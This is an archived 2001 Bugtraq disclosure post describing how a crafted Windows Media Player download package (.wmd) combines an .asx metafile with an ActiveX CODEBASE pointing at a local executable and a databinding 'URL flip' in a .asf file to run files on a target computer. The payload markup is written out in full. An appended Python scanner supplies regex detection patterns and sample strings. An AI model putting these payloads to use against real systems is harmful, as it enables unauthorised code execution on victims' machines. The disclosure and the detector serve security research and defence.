Bugtraq mailing list archives

Re: Microsoft Security Bulletin MS01-042 [a.k.a. - Windows Media Player File Execution ]


From: "http-equiv () excite com" <http-equiv () excite com>
Date: Fri, 27 Jul 2001 10:09:07 -0700 (PDT)

- ----------------------------------------------------------------------
Title:      Windows Media Player .NSC Processor Contains Unchecked
            Buffer
Date:       26 July 2001
Software:   Windows Media Player 6.4, 7, and 7.1
Impact:     Run code of attacker's choice.
Bulletin:   MS01-042



Here, while you are about it, take a look at this:

Windows Media Player executing files on the target computer as follows:

1. Create an *.asx meta file as follows:

<ASX><Entry><ref HREF=''/></ASX>
<IFRAME SRC='about:<body><html><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\WINDOWS\Regedit.exe"></OBJECT></html></body>'></IFRAME>
<!-- 27.07.01 http://www.malware.com -->

2. Create an *.asf file with URL flip as follows:

about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0
CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="file://C:\My Documents\My Music\Virtual
Albums\malware\malware.asx"><PARAM NAME="UseHeader"
VALUE="true"></OBJECT><div   datasrc=#Content
datafld="&lt;ASX&gt;&lt;Entry&gt;&lt;ref HREF=''/&gt;&lt;/ASX&gt;"
dataformatas="HTML" style="width: 100%; height: 60%;"></div>


3. Create a *.wmd file comprising 1 and 2 above.

What happens?

Ordinarily the Windows Media Download Package file (*.wmd) creates a folder
with the given name of the *.wmd file -- e.g. malware.wmd will create a
folder called malware in the default location for so-called "Virtual Music"
-- specifically: My Documents\My Music\Virtual Albums\malware. Security
measures currently incorporated in the extraction of the contents of the
*.wmd do a reasonably good job of ensuring that files contained within the
Download Package are in fact valid files.

A reasonably good job.

We find that the bare minimum for the *.asx meta file must include the
following:

<ASX><Entry><ref HREF=''/></ASX>

With these tags the Media Player will indeed extract the *.asx file into our
known folder. So how do we make use of that?

Databinding.

We find that we can parse html using the databinding control included in
IE5. And we do it like so:

The databinding control requires a header to match what it is to write as
html. What we do, quite brilliantly actually, is use the *.asx header as our
header for the databinding control:

*.asx - <ASX><Entry><ref HREF=''/></ASX>

databinding control: datafld="&lt;ASX&gt;&lt;Entry&gt;&lt;ref
HREF=''/&gt;&lt;/ASX&gt;"

The Windows Media Package file (malware.wmd) is automatically opened from
web or news or mail, it automatically creates the malware folder in the
so-called "Virtual Music" directory. It automatically extracts the
malware.asx meta file, which is valid but includes our ActiveX component as
above, and it extracts our malware.asf file which includes our URL flip.
The URL flip is called once the malware.asf starts playing, it creates an
"about" window from within the malware folder, the "about" window includes
our databinding control which points to the malware.asx, which is rendered as
*.html because the datafld header *IS* the *.asx meta tag!

And that all in turn executes! our file on the target computer.

Notes:

1. The machine that this is all on is now dead thanks to your module
MSDXM.OCX which will require a reformat. Nevertheless a fully functional
example has been thoroughly tested in "the field".
2. The "free" Advanced Script Indexer that comes with the Windows Media 7
Resource Kit allows us to include in the URL flip whatever we like.
3. The path to the so-called "Virtual Music" directory is hard-coded in the
above. The possibility of not having to know the location is good because
everything is opened from within the same folder created by the Windows
Media Download package, i.e. possibly through a "skin" file, or some other
entry in the *.asx such as an <event> parameter coupled with scripting in
the *.asf or *.wmz file(s); relative paths should work.
4. When it suits us, we'll recompile the working example if none of the
above is clear.
5. It took 10 days to conceive, craft and construct, of which about 5 days
were spent crashing and scandisk"ing" at minimum 4 times per day. Win98.
Very unstable.


---
http://www.malware.com
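A defender-side example, added for this archive page and not part of the original post or of any malware.com code: a heuristic scanner that flags Windows Media metafiles (*.asx) and URL-flip strings carrying the patterns the post describes (HTML tags smuggled after the playlist envelope, an ActiveX CLASSID with a CODEBASE pointing at a local path, about: and file:// URIs, the Tabular Data Control CLSID, and entity-encoded markup in a datafld attribute). The sample strings are constructed to mirror steps 1 and 2 above; the CLSID 333C7BC4-460F-11D0-BC04-0080C7055A83 is the one quoted in the post, while the all-zero CLSID and the C:\placeholder paths are placeholders. The allowed-tag list for a plain playlist is an assumption for this example, not a Microsoft specification.

```python
import re

# CLSID of the Tabular Data Control (databinding) quoted in the post above.
TDC_CLSID = "333C7BC4-460F-11D0-BC04-0080C7055A83"

# Heuristic rules: (finding name, pattern). Case-insensitive, since the
# payloads in the post mix upper and lower case freely.
RULES = [
    ("html-markup", re.compile(r"<\s*(iframe|object|script|embed|applet)\b", re.I)),
    ("activex-classid", re.compile(r"""classid\s*=\s*["']?clsid:""", re.I)),
    ("codebase-local-path", re.compile(r"""codebase\s*=\s*["']?(?:[a-z]:\\|file:)""", re.I)),
    ("about-uri", re.compile(r"\babout:", re.I)),
    ("file-uri", re.compile(r"\bfile://", re.I)),
    ("databinding", re.compile(r"\b(datasrc|datafld|dataformatas)\s*=", re.I)),
    ("tdc-clsid", re.compile(re.escape(TDC_CLSID), re.I)),
    # datafld="&lt;ASX&gt;..." : entity-encoded markup reused as a column header
    ("entity-encoded-markup", re.compile(r"&lt;\s*[a-z]", re.I)),
]

# Elements a normal ASX playlist uses (assumed allow-list for this example).
ALLOWED_ASX_TAGS = {"asx", "entry", "ref", "title", "author", "copyright",
                    "abstract", "param", "base", "duration"}


def scan(text):
    """Return the sorted names of every rule that fires on text."""
    return sorted(name for name, pat in RULES if pat.search(text))


def is_plain_asx(text):
    """True when the metafile uses only playlist elements and trips no rule."""
    tags = {m.group(1).lower()
            for m in re.finditer(r"<\s*/?\s*([a-z][a-z0-9]*)", text, re.I)}
    return tags <= ALLOWED_ASX_TAGS and not scan(text)


# Constructed samples (not the exact strings from the post).
BENIGN_ASX = """<ASX version="3.0"><Entry><Title>Stream</Title>
<ref HREF="http://media.example.invalid/stream.asf"/></Entry></ASX>"""

# Mirrors step 1: a valid ASX envelope followed by smuggled HTML that
# instantiates an object from a local path (placeholder CLSID and path).
SUSPICIOUS_ASX = r"""<ASX><Entry><ref HREF=''/></ASX>
<IFRAME SRC='about:<OBJECT CLASSID="CLSID:00000000-0000-0000-0000-000000000000"
CODEBASE="C:\placeholder\app.exe"></OBJECT>'></IFRAME>"""

# Mirrors step 2: an about: URL flip that loads a local .asx through the
# Tabular Data Control and rebinds it as HTML (placeholder path).
URL_FLIP = r"""about:<OBJECT ID="Content" WIDTH=0 HEIGHT=0
CLASSID="CLSID:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="file://C:\placeholder\placeholder.asx"><PARAM NAME="UseHeader"
VALUE="true"></OBJECT><div datasrc=#Content
datafld="&lt;ASX&gt;&lt;Entry&gt;&lt;ref HREF=''/&gt;&lt;/ASX&gt;"
dataformatas="HTML"></div>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_ASX), ("asx", SUSPICIOUS_ASX),
                          ("flip", URL_FLIP)):
        print(label, "plain" if is_plain_asx(sample) else "flagged", scan(sample))
```

Run over the benign playlist the scanner reports nothing and `is_plain_asx` returns True; the step-1 style metafile trips the markup, CLASSID, local CODEBASE and about: rules, and the step-2 style URL flip additionally trips the file://, databinding, TDC CLSID and entity-encoded-markup rules. A mail or download gateway could apply `scan` to every *.asx and *.asf extracted from a *.wmd package and quarantine anything that is not a plain playlist.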
